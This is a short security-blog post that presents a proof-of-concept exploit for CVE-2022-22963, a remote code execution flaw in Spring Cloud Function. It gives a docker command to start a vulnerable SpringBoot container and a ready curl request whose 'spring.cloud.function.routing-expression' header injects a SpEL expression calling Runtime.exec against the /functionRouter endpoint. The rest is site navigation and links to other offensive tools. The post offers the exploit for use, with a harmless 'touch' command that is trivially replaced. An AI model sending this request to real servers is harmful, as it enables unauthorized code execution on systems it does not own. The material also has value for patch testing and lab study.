CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’

Or using Burp suite:

R K

Next CVE-2022-27254 : PoC For Vulnerability In Honda's Remote Keyless System »

Previous « Casper-Fs : A Custom Hidden Linux Kernel Module Generator

Leave a Comment

Share

Published by

R K

Tags: CVE-2022-22963Java Frameworkremote code execution

3 years ago

Recent Posts

Vulnerability Analysis

garak, LLM Vulnerability Scanner : The Comprehensive Tool For Assessing Language Model Security

garak checks if an LLM can be made to fail in a way we don't…

1 day ago

Post Exploitation

Vermilion : Mastering Linux Post-Exploitation For Red Team Success

Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…

1 day ago

Exploitation Tools

AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that can be used to exploit the AD CS container…

1 day ago

Hacking Tools

Usage Of Tartufo – A Comprehensive Guide To Securing Your Git Repositories

Tartufo will, by default, scan the entire history of a git repository for any text…

1 day ago

software

Loco : A Rails-Inspired Framework For Rust Developers

Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…

2 days ago

Applications

Monolith : The Ultimate Tool For Storing Entire Web Pages As Single HTML Files

A data hoarder’s dream come true: bundle any web page into a single HTML file.…

2 days ago

L